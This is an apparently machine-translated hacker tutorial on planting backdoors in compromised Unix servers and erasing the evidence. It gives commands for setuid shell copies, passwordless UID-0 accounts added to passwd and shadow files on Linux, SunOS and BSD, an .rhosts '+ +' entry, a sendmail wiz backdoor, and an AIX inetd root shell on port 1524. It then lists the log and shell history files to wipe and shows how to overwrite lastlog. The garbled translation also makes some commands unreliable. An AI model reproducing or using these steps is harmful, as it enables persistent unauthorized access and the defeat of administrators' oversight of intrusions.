Research on the system backdoor technique and log erasure _ vulnerability

It's not easy to get a server, if it's found, it's gone! What a pity!
In fact, there are many kinds of backdoor methods

1. setuid
#cp/bin/sh/tmp/.sh
#chmod u+s/tmp/.sh
Plus suid bit to shell, though very simple, but easy to be found

2. Echo "Hack::0:0::/:/bin/csh" >>/etc/passwd
That is, add an ID 0 (root) account to the system, no password.
But the administrator will soon be able to find out Oh!
3.echo "+ +" >>/.rhosts
If this system opened 512,513 port hehe, you can
Add a name hack to the. rhosts file, rlogin login, no password!

4. To amend the SENDMAIL.CF document by adding a "Wiz" order;
Then Telnet www.xxx.com after 25, Wiz .... Ok
　
5. Change existing user password
If there are many users on the host, when you see a user for a long time did not log in, you can change his password
The passwd command is available #passwd.
6.rootkit Back door Pack
There are many places on the Internet to download, look for, I try, I also in the test! NO,!!!!.
-bsd Back door:
echo love::92:206::0:0::/:/bin/sh >>/etc/master.passwd
/usr/sbin/pwd_mkdb/etc/master.passwd

Here I add a love to the user ID of the user is 92;root is 0 Oh!
Okay, let's add a user! What about the lack of access?
Cp/bin/sh/tmp/.x (this x is a random choice, like. Sh,. A,. B, etc.)
chmod 777/tmp/.x
chmod +s/tmp/.x
Just use this to make him a little back door.
After we landed this broiler can use tmp/.x to elevate the privilege.

-aix back door (Kelvinzhou taught me, thank you)
echo "Ingreslock stream TCP nowait root/bin/sh" >>/tmp/.x
/usr/sbin/inetd-s/tmp/.x
rm/tmp/.x
So you can telnet IP 1524 directly to get Rootshell
-sunos Back Door
echo "Love::0:0::/:/bin/bash" >>/etc/passwd
echo "Love:::::::" >>/etc/shadow
When you telnet, you are root! But not insurance!
-linux Back Door
echo "Love::0:0::/:/bin/bash" >>/etc/passwd
echo "Love:::::::" >>/etc/shadow
If you have time, just leave a few more back doors!
Leave the back door will wipe your PP, not, this also forgot!
Unix System log files are usually stored in the "/var/log and/var/adm" directory. Usually we can look at the syslog.conf to see the log configuration. such as: cat/etc/syslog.conf
Generally we want to clear the log there
Lastlog
Utmp
Wtmp
Messages
Syslog
Sulog
In addition, the various shells also record the command history used by the user, which records the history of these commands using the files in the user's home directory, usually with the name. Sh_history (Ksh),. History (CSH), or. bash_history (bash).
If you have a log-like wipe.c program, you can let it do it, otherwise it will be manual! It is recommended not to use RM off the log, preferably, to adapt the log,
Like what:
#cat >/usr/log/lastlog
-> Here is what you want to write, or you can not input Oh!
^d-> Here The ^d is the key ctrl + D! End!
#
Well not to say, to learn a good many, I also very vegetables! see!